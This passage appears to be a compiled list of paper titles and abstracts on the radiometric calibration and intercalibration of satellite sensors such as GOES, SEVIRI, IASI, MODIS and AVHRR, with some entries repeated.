satellite and the Infrared Atmospheric Sounding Interferometer (IASI) on the Metop-A satellite, are used as the reference instruments in this study. However, as the timing of the collocated geostationary-LEO intercalibration data is related to the GOES scan angle, it is then necessary to assess the GOES scan angle calibration variations, which becomes the second objective of this study. Our results show that the applications and performance of the MBCC method varies greatly between the different channels and different times. While it is usually applied with high frequency for about 8 h around satellite midnight for the short-wave channels (Ch2), it may only be intensively used right after satellite midnight or even barely used for the other IR channels. The MBCC method, if applied with high frequency, can reduce the mean day/night calibration difference to less than 0.15 K in almost all the GOES IR channels studied in this paper except for Ch4 (10.7 μm). The uncertainty of the nighttime GOES and IASI Tb difference for different scan angles is less than 0.1 K in each IR channel, indicating that there is no apparent systematic variation with the scan angle, and therefore, the estimated diurnal cycles of GOES Imager calibration is not prone to the systematic effects due to scan angle. --- paper_title: An Evaluation of the Uncertainty of the GSICS SEVIRI-IASI Intercalibration Products paper_content: Global Space-based Inter-Calibration System (GSICS) products to correct the calibration of the infrared channels of the Meteosat/SEVIRI (Spinning Enhanced Visible and Infrared Imager) geostationary imagers are based on comparisons of collocated observations with Metop/IASI (Infrared Atmospheric Sounding Interferometer) as a reference instrument. Each step of the cross-calibration algorithm is analyzed to produce a comprehensive error budget, following the Guide to the Expression of Uncertainty in Measurement. This paper aims to validate the quality indicators provided as uncertainty estimates with the GSICS correction. The methodology presented provides a framework to allow quantitative tradeoffs between the collocation criteria and the number of collocations generated to recommend further algorithm improvements. It is shown that random errors dominate systematic ones and that combined standard uncertainties (with coverage factor k = 1) in the corrected brightness temperatures are ~ 0.01 K for typical clear sky conditions but increase rapidly for low radiances - by more than one order of magnitude for 210 K scenes, corresponding to cold cloud tops. --- paper_title: CLARREO: cornerstone of the climate observing system measuring decadal change through accurate emitted infrared and reflected solar spectra and radio occultation paper_content: The CLARREO mission addresses the need to provide accurate, broadly acknowledged climate records that can be used ::: to validate long-term climate projections that become the foundation for informed decisions on mitigation and adaptation ::: policies. The CLARREO mission accomplishes this critical objective through rigorous SI traceable decadal change ::: observations that will reduce the key uncertainties in current climate model projections. These same uncertainties also ::: lead to uncertainty in attribution of climate change to anthropogenic forcing. CLARREO will make highly accurate and ::: SI-traceable global, decadal change observations sensitive to the most critical, but least understood climate forcing, ::: responses, and feedbacks. The CLARREO breakthrough is to achieve the required levels of accuracy and traceability to ::: SI standards for a set of observations sensitive to a wide range of key decadal change variables. The required accuracy ::: levels are determined so that climate trend signals can be detected against a background of naturally occurring ::: variability. The accuracy for decadal change traceability to SI standards includes uncertainties associated with ::: instrument calibration, satellite orbit sampling, and analysis methods. Unlike most space missions, the CLARREO ::: requirements are driven not by the instantaneous accuracy of the measurements, but by accuracy in the large time/space ::: scale averages that are necessary to understand global, decadal climate changes. --- paper_title: Operational calibration of the Advanced Very High Resolution Radiometer (AVHRR) visible and near-infrared channels paper_content: The Advanced Very High Resolution Radiometer (AVHRR) visible and near-infrared channels must be calibrated after launch to maintain the accuracy of data derived from these channels for quantitative utilizations. The postlaunch calibration of these channels can only be carried out vicariously. The National Oceanic and Atmospheric Administration (NOAA) – National Environmental Satellite, Data, an Information Service (NESDIS) has been using the Libyan Desert as reference for operational calibration of AVHRR visible and near-infrared channels since 1995. A previous algorithm was successful correcting for the long-term instrument degradation in recalibration but had difficulty updating instrument calibration in near-real-time operation. This paper describes the operational calibration algorithm implemented since 2003, which overcomes the existing shortcomings by reducing target contamination and accounting for the effects of target bidirectional reflectance distribution function. Application of the algorithm s... --- paper_title: Effects of Ice Decontamination on GOES-12 Imager Calibration paper_content: More precise and accurate geostationary measurements are highly needed for satellite applications. It was well known that the Geostationary Operational Environmental Satellite (GOES)-12 imager was susceptible to water-ice contamination, and thus, several decontamination efforts were carried out to remove built-up ice on the instrument during operation. The intercalibration results of GOES-12 with the Atmospheric Infrared (IR) Sounder (AIRS) and the Infrared Atmospheric Sounding Interferometer (IASI) indicate that the calibration accuracy of GOES-12 was impacted by the decontamination procedures. Relative to the AIRS and the IASI, the GOES-12 imager radiances or brightness temperatures increased in the CO2 sounding channel (channel 6, 13.3 μm) and decreased in the water-vapor absorption channel (channel 3, 6.5 μm) but was less changed in the window channel (channel 4, 10.7 μm). A simple conceptual model is then proposed to give a physical explanation on the different behaviors of three IR channels in response to the ice-removal procedures. --- paper_title: Correction for GOES Imager Spectral Response Function Using GSICS. Part II: Applications paper_content: During the Geostationary Operational Environmental Satellite (GOES)-14 and -15 post-launch test (PLT) for science periods, an up to ~ 2 K mean brightness temperature (Tb) bias with respect to collocated Atmospheric Infrared Sounder (AIRS) and Infrared Atmospheric Sounding Interferometer (IASI) observations was observed in the absorptive IR channels of the GOES-14/15 Imagers. These large scene-dependent biases were believed to be caused mainly by spectral characterization errors. In this paper, we refined the spectral response function (SRF) shift algorithm which was developed during the GOES-13 PLT period to improve the GOES-14/15 Imager IR radiometric calibration accuracy by accurately calculating the impact of blackbody on the calibrated scene radiance. The uncertainty of the SRF shift algorithm was estimated and used to guide the final selection of the total amount of central wave-number shift. This refined algorithm was first verified with GOES-13 Imager Ch6 data and then used to evaluate and further revise the audited GOES-14/15 SRFs provided by the instrument vendor. Based on this algorithm, the optimal SRF shifts were -1.98 cm-1 for GOES-13 Ch6, -8.25 cm-1 for GOES-14 Ch3, -0.25 cm-1 for GOES-14 Ch6, -6.25 cm-1 for GOES-15 Ch3 and +0.50 cm-1 for GOES-15 Ch6. The newly shifted SRFs were operationally implemented into the GOES-14/15 Imager IR calibrations in the August of 2011 and successfully reduced the mean all-sky Tb bias with respect to the reference instrument to less than 0.15 K. The scene-dependent bias, which can be nonlinear at large erroneous SRF, was also greatly reduced. The same method was applied to correct the GOES-12 Imager Ch6 SRF which has a changing SRF error during its mission life. A strong linear relationship between the optimal SRF shifts and the mean Tb bias with respect to the AIRS data was observed at this channel. This strong linear relationship can be used to revise the GOES-12 Ch6 SRF for a better radiance simulation. The method described in this paper is particularly important to evaluate and revise the erroneous SRF, if it exists, after satellite launch yet before it becomes fully operational. --- paper_title: Selection and characterization of Saharan and Arabian desert sites for the calibration of optical satellite sensors paper_content: Desert areas are good candidates for the assessment of multitemporal, multiband, or multiangular calibration of optical satellite sensors. This article describes a selection procedure of desert sites in North Africa and Saudi Arabia, of size 100 × 100 km2, using a criterion of spatial uniformity in a series of Meteosat-4 visible data. Twenty such sites are selected with a spatial uniformity better than 3% in relative value in a multitemporal series of cloud free images. These sites are among the driest sites in the world. Their meteorological properties are here described in terms of cloud cover with ISCCP data and precipitation using data from a network of meteorological stations. Most of the selected sites are large sand seas, the geomorphology of which can be characterized with Spot data. The temporal stability of the spatially averaged reflectance of each selected site is investigated at seasonal and hourly time scales with multitemporal series of Meteosat-4 data. It is found that the temporal variations, of typical peak-to-peak amplitude 8–15% in relative value, are mostly controlled by directional effects. Once the directional effects are removed, the residual rms variations, representative of random temporal variability, are on the order of 1–2% in relative value. The suitability of use of these selected sites in routine operational calibration procedures is briefly discussed. --- paper_title: Cross Calibration Over Desert Sites: Description, Methodology, and Operational Implementation paper_content: Radiometric cross calibration of Earth observation sensors is a crucial need to guarantee or quantify the consistency of measurements from different sensors. Twenty desert sites, historically selected, are revisited, and their radiometric profiles are described for the visible to the near-infrared spectral domain. Therefore, acquisitions by various sensors over these desert sites are collected into a dedicated database, Structure d'Accueil des Donnees d'Etalonnage, defined to manage operational calibrations and the required SI traceability. The cross-calibration method over desert sites is detailed. Surface reflectances are derived from measurements by a reference sensor and spectrally interpolated to derive the surface and then top-of-atmosphere reflectances for spectral bands of the sensor to calibrate. The comparison with reflectances really measured provides an estimation of the cross calibration between the two sensors. Results illustrate the efficiency of the method for various pairs of sensors among AQUA-Moderate Resolution Imaging Spectroradiometer (MODIS), Environmental Satellite-Medium Resolution Imaging Spectrometer (MERIS), Polarization and Anisotropy of Reflectance for Atmospheric Sciences Couples With Observations From a Lidar (PARASOL)-Polarization and Directionality of the Earth Reflectances (POLDER), and Satellite pour l'Observation de la Terre 5 (SPOT5)-VEGETATION. MERIS and MODIS calibrations are found to be very consistent, with a discrepancy of 1%, which is close to the accuracy of the method. A larger bias of 3% was identified between VEGETATION-PARASOL on one hand and MERIS-MODIS on the other hand. A good consistency was found between sites, with a standard deviation of 2% for red to near-infrared bands, increasing to 4% and 6% for green and blue bands, respectively. The accuracy of the method, which is close to 1%, may also depend on the spectral bands of both sensor to calibrate and reference sensor (up to 5% in the worst case) and their corresponding geometrical matching. --- paper_title: Photometric Stability of the Lunar Surface paper_content: Abstract The rate at which cratering events currently occur on the Moon is considered in light of their influence on the use of the Moon as a radiometric standard. The radiometric effect of small impact events is determined empirically from the study of Clementine images. Events that would change the integral brightness of the moon by 1% are expected once per 1.4 Gyr. Events that cause a 1% shift in one pixel for low Earth-orbiting instruments with a 1-km nadir field of view are expected approximately once each 43 Myr. Events discernible at 1% radiometric resolution with a 5 arc-sec telescope resolution correspond to crater diameters of approximately 210 m and are expected once every 200 years. These rates are uncertain by a factor of two. For a fixed illumination and observation geometry, the Moon can be considered photometrically stable to 1 × 10 −8 per annum for irradiance, and 1 × 10 −7 per annum for radiance at a resolution common for spacecraft imaging instruments, exceeding reasonable instrument goals by six orders of magnitude. --- paper_title: Applications of Spectral Band Adjustment Factors (SBAF) for Cross-Calibration paper_content: To monitor land surface processes over a wide range of temporal and spatial scales, it is critical to have coordinated observations of the Earth's surface acquired from multiple spaceborne imaging sensors. However, an integrated global observation framework requires an understanding of how land surface processes are seen differently by various sensors. This is particularly true for sensors acquiring data in spectral bands whose relative spectral responses (RSRs) are not similar and thus may produce different results while observing the same target. The intrinsic offsets between two sensors caused by RSR mismatches can be compensated by using a spectral band adjustment factor (SBAF), which takes into account the spectral profile of the target and the RSR of the two sensors. The motivation of this work comes from the need to compensate the spectral response differences of multispectral sensors in order to provide a more accurate cross-calibration between the sensors. In this paper, radiometric cross-calibration of the Landsat 7 Enhanced Thematic Mapper Plus (ETM+) and the Terra Moderate Resolution Imaging Spectroradiometer (MODIS) sensors was performed using near-simultaneous observations over the Libya 4 pseudoinvariant calibration site in the visible and near-infrared spectral range. The RSR differences of the analogous ETM+ and MODIS spectral bands provide the opportunity to explore, understand, quantify, and compensate for the measurement differences between these two sensors. The cross-calibration was initially performed by comparing the top-of-atmosphere (TOA) reflectances between the two sensors over their lifetimes. The average percent differences in the long-term trends ranged from -5% to +6%. The RSR compensated ETM+ TOA reflectance (ETM+*) measurements were then found to agree with MODIS TOA reflectance to within 5% for all bands when Earth Observing-1 Hyperion hyperspectral data were used to produce the SBAFs. These differences were later reduced to within 1% for all bands (except band 2) by using Environmental Satellite Scanning Imaging Absorption Spectrometer for Atmospheric Cartography hyperspectral data to produce the SBAFs. --- paper_title: Ice contamination of Meteosat/SEVIRI IR13.4 channel implied by Inter-Calibration against Metop/IASI paper_content: The inter-calibration of the infrared channels of the geostationary Meteosat/SEVIRI satellite instruments shows most channels are radiometrically consistent with Metop-A/IASI, which is used as a reference instrument. However, the 13.4 µm channel shows a cold bias of ∼1 K in warm scenes, which changes with time. This is shown to be consistent with the contamination of SEVIRI by a layer of ice ∼1 µm thick building up on the optics, which is believed to have condensed from water outgassed from the spacecraft. This modifies the spectral response functions and hence the weighting functions of channels in stronger atmospheric absorption bands, thus introducing an apparent calibration error. Analysis of the radiometer's gain using views of the on board black body source and cold space confirm a loss consistent with transmission through a layer of comparable thickness, which also increases the radiometric noise — especially for channels near the 12 µm libration band of water ice. Inter-calibration, such as the Global Space-based Inter-Calibration System (GSICS) Correction, offers an empirical method to correct this bias. --- paper_title: Spectral Reflectance Corrections for Satellite Intercalibrations Using SCIAMACHY Data paper_content: High-resolution spectra measured by the ENVISAT SCanning Imaging Absorption spectroMeter for Atmospheric CartograpHY (SCIAMACHY) are used to develop spectral correction factors for satellite imager solar channels to improve the transfer of calibrations from one imager to another. SCIAMACHY spectra averaged for various scene types demonstrate the dependence of reflectance on imager spectral response functions. Pseudo imager radiances were computed separately over land and water from SCIAMACHY pixel spectra taken over two tropical domains. Spectral correction factors were computed from these pseudo imager radiance pairs. Intercalibrations performed using matched 12th Geostationary Operational Environmental Satellite and Terra MODerate-resolution Imaging Spectroradiometer (MODIS) visible ( ~ 0.65 μm) channel data over the same domains yielded ocean and land calibration gain and offset differences of 4.5% and 41%, respectively. Applying the spectral correction factors reduces the gain and offset differences to 0.1% and 3.8%, respectively, for free linear regression. Forcing the regression to use the known offset count reduces the land-ocean radiance differences to 0.3% or less. Similar difference reductions were found for matched MODIS and Meteosat-8 Spinning Enhanced Visible and Infrared Imager channel 2 ( ~ 0.86 μm ). The results demonstrate that SCIAMACHY-based spectral corrections can be used to significantly improve the transfer of calibration between any pair of imagers measuring reflected solar radiances under similar viewing and illumination conditions. --- paper_title: Impacts of spectral band difference effects on radiometric cross-calibration between satellite sensors in the solar-reflective spectral domain paper_content: Abstract In order for quantitative applications to make full use of the ever-increasing number of Earth observation satellite systems, data from the various imaging sensors involved must be on a consistent radiometric scale. This paper reports on an investigation of radiometric calibration errors due to differences in spectral response functions between satellite sensors when attempting cross-calibration based on near-simultaneous imaging of common ground targets in analogous spectral bands, a commonly used post-launch calibration methodology. Twenty Earth observation imaging sensors (including coarser and higher spatial resolution sensors) were considered, using the Landsat solar reflective spectral domain as a framework. Scene content was simulated using spectra for four ground target types (Railroad Valley Playa, snow, sand and rangeland), together with various combinations of atmospheric states and illumination geometries. Results were obtained as a function of ground target type, satellite sensor comparison, spectral region, and scene content. Overall, if spectral band difference effects (SBDEs) are not taken into account, the Railroad Valley Playa site is a “good” ground target for cross calibration between most but not all satellite sensors in most but not all spectral regions investigated. “Good” is defined as SBDEs within ± 3%. The other three ground target types considered (snow, sand and rangeland) proved to be more sensitive to uncorrected SBDEs than the RVPN site overall. The spectral characteristics of the scene content (solar irradiance, surface reflectance and atmosphere) are examined in detail to clarify why spectral difference effects arise and why they can be significant when comparing different imaging sensor systems. Atmospheric gas absorption features are identified as being the main source of spectral variability in most spectral regions. The paper concludes with recommendations on spectral data and tools that would facilitate cross-calibration between multiple satellite sensors. --- paper_title: Targets, methods, and sites for assessing the in-flight spatial resolution of electro-optical data products paper_content: The spatial resolution of a digital, electro-optical remote sensing imaging system or product is an important image quality characteristic that helps determine the utility of an imaging source. Although spatial resolution is often described by a single image quality parameter, the ground sample distance, there are several other parameters that affect image sharpness and need to be considered. These other parameters are associated with the point-spread function, signal-to-noise ratio, and dynamic range of the image product. This review paper covers the various approaches to in-flight measurement of spatial resolution parameters, including ground sample distance, point spread function, optical transfer function, modulation transfer function, far field response, and edge response and their significance, as well as target types and methods to determine these spatial resolution parameters. To this end, the paper lists and describes various targets found across the world, as well as astronomical ones. These tar... --- paper_title: Photometric Stability of the Lunar Surface paper_content: Abstract The rate at which cratering events currently occur on the Moon is considered in light of their influence on the use of the Moon as a radiometric standard. The radiometric effect of small impact events is determined empirically from the study of Clementine images. Events that would change the integral brightness of the moon by 1% are expected once per 1.4 Gyr. Events that cause a 1% shift in one pixel for low Earth-orbiting instruments with a 1-km nadir field of view are expected approximately once each 43 Myr. Events discernible at 1% radiometric resolution with a 5 arc-sec telescope resolution correspond to crater diameters of approximately 210 m and are expected once every 200 years. These rates are uncertain by a factor of two. For a fixed illumination and observation geometry, the Moon can be considered photometrically stable to 1 × 10 −8 per annum for irradiance, and 1 × 10 −7 per annum for radiance at a resolution common for spacecraft imaging instruments, exceeding reasonable instrument goals by six orders of magnitude. --- paper_title: Assessing the consistency of AVHRR and MODIS L1B reflectance for generating Fundamental Climate Data Records paper_content: [1] Satellite detection of the global climate change signals as small as a few percent per decade in albedo critically depends on consistent and accurately calibrated Level 1B (L1B) data or Fundamental Climate Data Records (FCDRs). Detecting small changes in signal over decades is a major challenge not only to the retrieval of geophysical parameters from satellite observations, but more importantly to the current state-of-the-art calibration, since such small changes can easily be obscured by erroneous variations in the calibration, especially for instruments with no onboard calibration, such as the Advanced Very High Resolution Radiometer (AVHRR). Without dependable FCDRs, its derivative Thematic Climate Data Records (TCDRs) are bound to produce false trends with questionable scientific value. This has been increasingly recognized by more and more remote sensing scientists. In this study we analyzed the consistency of calibrated reflectance from the operational L1B data between AVHRR on NOAA-16 and -17 and between NOAA-16/AVHRR and Aqua/MODIS, based on Simultaneous Nadir Overpass (SNO) observation time series. Analyses suggest that the NOAA-16 and -17/AVHRR operationally calibrated reflectance became consistent two years after the launch of NOAA-17, although they still differ by 9% from the MODIS reflectance for the 0.63 μm band. This study also suggests that the SNO method has reached a high level of relative accuracy (∼1.5%) for estimating the consistency for both the 0.63 and 0.84 μm bands between AVHRRs, and a 0.9% relative accuracy between AVHRR and MODIS for the 0.63 μm band. It is believed that the methodology is applicable to all historical AVHRR data for improving the calibration consistency, and work is in progress generating FCDRs from the nearly 30 years of AVHRR data using the SNO and other complimentary methods. A more consistent historical AVHRR L1B data set will be produced for a variety of geophysical products including aerosol, vegetation, cloud, and surface albedo to support global climate change detection studies. --- paper_title: An Evaluation of the Uncertainty of the GSICS SEVIRI-IASI Intercalibration Products paper_content: Global Space-based Inter-Calibration System (GSICS) products to correct the calibration of the infrared channels of the Meteosat/SEVIRI (Spinning Enhanced Visible and Infrared Imager) geostationary imagers are based on comparisons of collocated observations with Metop/IASI (Infrared Atmospheric Sounding Interferometer) as a reference instrument. Each step of the cross-calibration algorithm is analyzed to produce a comprehensive error budget, following the Guide to the Expression of Uncertainty in Measurement. This paper aims to validate the quality indicators provided as uncertainty estimates with the GSICS correction. The methodology presented provides a framework to allow quantitative tradeoffs between the collocation criteria and the number of collocations generated to recommend further algorithm improvements. It is shown that random errors dominate systematic ones and that combined standard uncertainties (with coverage factor k = 1) in the corrected brightness temperatures are ~ 0.01 K for typical clear sky conditions but increase rapidly for low radiances - by more than one order of magnitude for 210 K scenes, corresponding to cold cloud tops. --- paper_title: Microwave Radiometer Radio-Frequency Interference Detection Algorithms: A Comparative Study paper_content: Two algorithms used in microwave radiometry for radio-frequency interference (RFI) detection and mitigation are the pulse detection algorithm and the kurtosis detection algorithm. The relative performance of the algorithms is compared both analytically and empirically. Their probabilities of false alarm under RFI-free conditions and of detection when RFI is present are examined. The downlink data rate required to implement each algorithm in a spaceborne application is also considered. The kurtosis algorithm is compared to a pulse detection algorithm operating under optimal RFI detection conditions. The performance of both algorithms is also analyzed as a function of varying characteristics of the RFI. The RFI detection probabilities of both algorithms under varying subsampling conditions are compared and validated using data obtained from a field campaign. Implementation details, resource usage, and postprocessing requirements are also addressed for both algorithms. --- paper_title: An Evaluation of the Uncertainty of the GSICS SEVIRI-IASI Intercalibration Products paper_content: Global Space-based Inter-Calibration System (GSICS) products to correct the calibration of the infrared channels of the Meteosat/SEVIRI (Spinning Enhanced Visible and Infrared Imager) geostationary imagers are based on comparisons of collocated observations with Metop/IASI (Infrared Atmospheric Sounding Interferometer) as a reference instrument. Each step of the cross-calibration algorithm is analyzed to produce a comprehensive error budget, following the Guide to the Expression of Uncertainty in Measurement. This paper aims to validate the quality indicators provided as uncertainty estimates with the GSICS correction. The methodology presented provides a framework to allow quantitative tradeoffs between the collocation criteria and the number of collocations generated to recommend further algorithm improvements. It is shown that random errors dominate systematic ones and that combined standard uncertainties (with coverage factor k = 1) in the corrected brightness temperatures are ~ 0.01 K for typical clear sky conditions but increase rapidly for low radiances - by more than one order of magnitude for 210 K scenes, corresponding to cold cloud tops. --- paper_title: Assessment of Spectral, Misregistration, and Spatial Uncertainties Inherent in the Cross-Calibration Study paper_content: Cross-calibration of satellite sensors permits the quantitative comparison of measurements obtained from different Earth Observing (EO) systems. Cross-calibration studies usually use simultaneous or near-simultaneous observations from several spaceborne sensors to develop band-by-band relationships through regression analysis. The investigation described in this paper focuses on evaluation of the uncertainties inherent in the cross-calibration process, including contributions due to different spectral responses, spectral resolution, spectral filter shift, geometric misregistrations, and spatial resolutions. The hyperspectral data from the Environmental Satellite SCanning Imaging Absorption SpectroMeter for Atmospheric CartograpHY and the EO-1 Hyperion, along with the relative spectral responses (RSRs) from the Landsat 7 Enhanced Thematic Mapper (TM) Plus and the Terra Moderate Resolution Imaging Spectroradiometer sensors, were used for the spectral uncertainty study. The data from Landsat 5 TM over five representative land cover types (desert, rangeland, grassland, deciduous forest, and coniferous forest) were used for the geometric misregistrations and spatial-resolution study. The spectral resolution uncertainty was found to be within 0.25%, spectral filter shift within 2.5%, geometric misregistrations within 0.35%, and spatial-resolution effects within 0.1% for the Libya 4 site. The one-sigma uncertainties presented in this paper are uncorrelated, and therefore, the uncertainties can be summed orthogonally. Furthermore, an overall total uncertainty was developed. In general, the results suggested that the spectral uncertainty is more dominant compared to other uncertainties presented in this paper. Therefore, the effect of the sensor RSR differences needs to be quantified and compensated to avoid large uncertainties in cross-calibration results. --- paper_title: Inversion algorithm for estimating radio frequency interference characteristics based on kurtosis measurements paper_content: An inversion algorithm is developed to recover power and duty-cycle of incoming Radio Frequency Interference (RFI) signals from kurtosis. The algorithm applies simulated annealing on multiple kurtosis values obtained from different radiometer integration periods. The paper evaluates the performance of the inversion algorithm by performing Monte-Carlo simulations to obtain error statistics. The inversion capability of the algorithm and its robustness against the 50% duty-cycle blind-spot (generally present for the kurtosis detection algorithm) is demonstrated using experimental data. --- paper_title: Intersatellite Differences of HIRS Longwave Channels Between NOAA-14 and NOAA-15 and Between NOAA-17 and METOP-A paper_content: Intersatellite differences of the High-Resolution Infrared Radiation Sounder (HIRS) longwave channels (channels 1-12) between National Oceanic and Atmospheric Administration 14 (NOAA-14) and NOAA-15 and between NOAA-17 and METOP-A are examined. Two sets of colocated data are incorporated in the examination. One data set is obtained during periods when equator crossing times of two satellites are very close to each other, and the data set is referred to as global simultaneous nadir overpass observation (SNO). The other data set is based on multiyear polar SNOs. The examination shows that intersatellite differences (ISDs) of temperature-sounding channels from lower stratosphere to lower troposphere, i.e., channels 3-7, are correlated with their corresponding lapse rate factors. Many of the channels also vary with respect to channel brightness temperatures; however, for the upper tropospheric temperature channel (channel 4), the patterns of ISDs from low latitudes and high latitudes are very different due to the fact that the latitudinal variation of brightness temperature does not necessarily follow the latitudinal variation of the temperature lapse rate. The differences between observations in low latitudes and high latitudes form “fork” patterns in scatter plots of ISDs with respect to brightness temperatures. A comparison of ISDs derived from short-term global SNOs and those derived from multiyear polar SNOs reveals the advantage and the limitation of the two data sets. The multiyear polar SNO generally provides larger observation ranges of brightness temperatures in channels 1-4. The global SNO extends the brightness temperature observations to the warm sides for channels 5-12 and captures the occurrences of larger ISDs for most longwave channels. --- paper_title: GSICS Inter-Calibration of Infrared Channels of Geostationary Imagers Using Metop/IASI paper_content: The first products of the Global Space-based Inter-Calibration System (GSICS) include bias monitoring and calibration corrections for the thermal infrared (IR) channels of current meteorological sensors on geostationary satellites. These use the hyperspectral Infrared Atmospheric Sounding Interferometer (IASI) on the low Earth orbit (LEO) Metop satellite as a common cross-calibration reference. This paper describes the algorithm, which uses a weighted linear regression, to compare collocated radiances observed from each pair of geostationary-LEO instruments. The regression coefficients define the GSICS Correction, and their uncertainties provide quality indicators, ensuring traceability to the selected community reference, IASI. Examples are given for the Meteosat, GOES, MTSAT, Fengyun-2, and COMS imagers. Some channels of these instruments show biases that vary with time due to variations in the thermal environment, stray light, and optical contamination. These results demonstrate how inter-calibration can be a powerful tool to monitor and correct biases, and help diagnose their root causes. --- paper_title: Accurate radiometry from space: an essential tool for climate studies paper_content: The Earth’s climate is undoubtedly changing; however, the time scale, consequences and causal attribution remain the subject of significant debate and uncertainty. Detection of subtle indicators from a background of natural variability requires measurements over a time base of decades. This places severe demands on the instrumentation used, requiring measurements of sufficient accuracy and sensitivity that can allow reliable judgements to be made decades apart. The International System of Units (SI) and the network of National Metrology Institutes were developed to address such requirements. However, ensuring and maintaining SI traceability of sufficient accuracy in instruments orbiting the Earth presents a significant new challenge to the metrology community. This paper highlights some key measurands and applications driving the uncertainty demand of the climate community in the solar reflective domain, e.g. solar irradiances and reflectances/radiances of the Earth. It discusses how meeting these uncertainties facilitate significant improvement in the forecasting abilities of climate models. After discussing the current state of the art, it describes a new satellite mission, called TRUTHS, which enables, for the first time, high-accuracy SI traceability to be established in orbit. The direct use of a ‘primary standard’ and replication of the terrestrial traceability chain extends the SI into space, in effect realizing a ‘metrology laboratory in space’. --- paper_title: Consistency assessment of Atmospheric Infrared Sounder and Infrared Atmospheric Sounding Interferometer radiances: Double differences versus simultaneous nadir overpasses paper_content: [1] Quantifying the radiometric difference and creating a calibration link between Atmospheric Infrared Sounder (AIRS) on Aqua and Infrared Atmospheric Sounding Interferometer (IASI) on MetOp are crucial for creating fundamental climate data records and intercalibrating other narrowband or broadband satellite instruments. This study employs two different methods to assess the AIRS and IASI radiance consistency within the four Geostationary Operational Environmental Satellite (GOES) imager infrared channels (with central wavelengths at 6.7, 10.7, 12.0, and 13.3 μm) through a period of 2 years and 9 months. The first method employs the differences of AIRS and IASI relative to the GOES observations sampled in the tropics to indirectly track the AIRS and IASI radiance differences. The second approach directly compares AIRS and IASI in the polar regions through the simultaneous nadir overpass observations. Both methods reveal that AIRS and IASI radiances are in good agreement with each other both in the tropics and in the polar regions within GOES imager channels used in this study, while AIRS is found to be slightly warmer than IASI by less than 0.1 K. --- paper_title: On-Orbit Calibration and Performance of Aqua MODIS Reflective Solar Bands paper_content: Aqua MODIS has successfully operated on-orbit for more than six years since its launch in May 2002, continuously making global observations and improving studies of changes in the Earth's climate and environment. Twenty of the 36 MODIS spectral bands, covering wavelengths from 0.41 to 2.2 ?m, are the reflective solar bands (RSBs). They are calibrated on-orbit using an onboard solar diffuser (SD) and an SD stability monitor. In addition, regularly scheduled lunar observations are made to track the RSB calibration stability. This paper presents Aqua MODIS RSB on-orbit calibration and characterization activities, methodologies, and performance. Included in this paper are characterizations of detector signal-to-noise ratio, short-term stability, and long-term response change. Spectral-wavelength-dependent degradation of the SD bidirectional reflectance factor and scan mirror reflectance, which also varies with the angle of incidence, is examined. On-orbit results show that Aqua MODIS onboard calibrators have performed well, enabling accurate calibration coefficients to be derived and updated for the Level 1B production and assuring high-quality science data products to be continuously generated and distributed. Since launch, the short-term response, on a scan-by-scan basis, has remained extremely stable for most RSB detectors. With the exception of band 6, there have been no new RSB noisy or inoperable detectors. Like its predecessor, i.e., Terra MODIS, launched in December 1999, the Aqua MODIS visible spectral bands have experienced relatively large changes, with an annual response decrease (mirror side 1) of 3.6% for band 8 at 0.412 ?m, 2.3% for band 9 at 0.443 ?m, 1.6% for band 3 at 0.469 ?m, and 1.2% for band 10 at 0.488 ?m. For other RSB bands with wavelengths greater than 0.5 ?m, the annual response changes are typically less than 0.5%. In general, Aqua MODIS optics degradation is smaller than Terra MODIS, and the mirror-side differences are much smaller. Overall, Aqua MODIS RSB on-orbit performance is better than that of Terra MODIS. --- paper_title: Diurnal and Scan Angle Variations in the Calibration of GOES Imager Infrared Channels paper_content: The current Geostationary Operational Environmental Satellite (GOES) Imager infrared (IR) channels experience a midnight effect that can result in erroneous instrument responsivity around satellite midnight. An empirical method named the Midnight Blackbody Calibration Correction (MBCC) was developed and implemented in the GOES Imager IR operational calibration, aiming to correct the midnight calibration errors. The main objective of this study is to evaluate the MBCC performance for the GOES-11/-12 Imager IR channels by examining the diurnal variation of the mean brightness temperature (Tb) bias with respect to reference instruments. Two well-calibrated hyperspectral radiometers on low Earth orbits (LEOs), the Atmospheric Infrared Sounder on the Aqua satellite and the Infrared Atmospheric Sounding Interferometer (IASI) on the Metop-A satellite, are used as the reference instruments in this study. However, as the timing of the collocated geostationary-LEO intercalibration data is related to the GOES scan angle, it is then necessary to assess the GOES scan angle calibration variations, which becomes the second objective of this study. Our results show that the applications and performance of the MBCC method varies greatly between the different channels and different times. While it is usually applied with high frequency for about 8 h around satellite midnight for the short-wave channels (Ch2), it may only be intensively used right after satellite midnight or even barely used for the other IR channels. The MBCC method, if applied with high frequency, can reduce the mean day/night calibration difference to less than 0.15 K in almost all the GOES IR channels studied in this paper except for Ch4 (10.7 μm). The uncertainty of the nighttime GOES and IASI Tb difference for different scan angles is less than 0.1 K in each IR channel, indicating that there is no apparent systematic variation with the scan angle, and therefore, the estimated diurnal cycles of GOES Imager calibration is not prone to the systematic effects due to scan angle. --- paper_title: Overview of NASA Earth Observing Systems Terra and Aqua moderate resolution imaging spectroradiometer instrument calibration algorithms and on-orbit performance paper_content: Since launch, Terra and Aqua MODIS have successfully operated on-orbit for more than 9 and 6.5 years, respectively. MODIS, a key instrument for the NASA's EOS missions, was designed to make continuous observations for studies of Earth's land, ocean, and atmospheric properties and to extend existing data records from heritage earth-observing sensors. In addition to frequent global coverage, MODIS observations are made in 36 spectral bands, covering both solar reflective and thermal emissive spectral regions. Nearly 40 data products are routinely generated from MODIS observations and publicly distributed for a broad range of applications. Both instruments have produced an unprecedented amount of data in support of the science community. As a general reference for understanding sensor operation and calibration, and thus science data quality, this paper provides an overview of the MODIS instruments and their pre-launch calibration and characterization, and describes their on-orbit calibration algorithms and performance. On-orbit results from both Terra and Aqua MODIS radiometric, spectral, and spatial calibration are discussed. Currently, both instruments, including their on-board calibration devices, are healthy and are expected to continue operation for several years to come. --- paper_title: Terra and Aqua MODIS inter-comparison of three reflective solar bands using AVHRR onboard the NOAA-KLM satellites paper_content: Cross-sensor inter-comparison is important to assess calibration quality and consistency and ensure continuity of observational datasets. This study conducts an inter-comparison of Terra and Aqua MODIS (the MODerate Resolution Imaging Spectroradiometer) to examine the overall calibration consistency of the reflective solar bands. Observations obtained from AVHRR (the Advanced Very High Resolution Radiometer) onboard the NOAA-KLM series of satellites are used as a transfer radiometer to examine three MODIS bands at 0.65 (visible), 0.85 (near-IR) and 1.64 µm (far near-IR) that match spectrally with AVHRR channels. Coincident events are sampled at a frequency of about once per month with each containing at least 3000 pixel-by-pixel matched data points. Multiple AVHRR sensors on-board NOAA-15 to 18 satellites are 